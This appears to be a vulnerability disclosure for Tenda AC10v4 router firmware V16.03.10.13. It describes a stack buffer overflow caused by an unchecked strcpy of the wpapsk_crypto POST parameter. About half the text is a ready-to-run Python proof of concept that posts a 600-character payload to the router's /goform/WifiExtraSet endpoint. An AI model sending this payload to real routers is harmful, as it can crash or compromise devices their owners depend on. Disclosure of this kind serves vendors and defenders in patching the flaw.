AC10v4 V16.03.10.13
In the Tenda AC10v4 V16.03.10.13 has a stack overflow vulnerability located in the FUN_0046AC38 function. This function accepts the wpapsk_crypto parameter from a POST request by variable wpapsk_crypto.
However, since the user has control over the input of wpapsk_crypto, the statement strcpy((char *)&local_1c,__s1); leads to a buffer overflow. The user-supplied wpapsk_crypto can exceed the capacity of the _s1 array, thus triggering this security vulnerability.
import requests
url = "<http://192.168.1.100/goform/WifiExtraSet>"
headers = {
"Content-Type": "application/x-www-form-urlencoded",
# Add other headers if needed, such as User-Agent, etc.
}
data = {
"wifi_chkHz": "0",
"wl_mode": "a24l",
"mac": "111", # Adjust the value as per your actual requirement
"handset": "0",
"wpapsk_crypto": "s"*600, # Verify if this is correct as per your needs
"wpapsk_key": "bXF" # Adjust the value as per your actual requirement
}
response = requests.post(url, headers=headers, data=data)
print(response.status_code)
print(response.text)
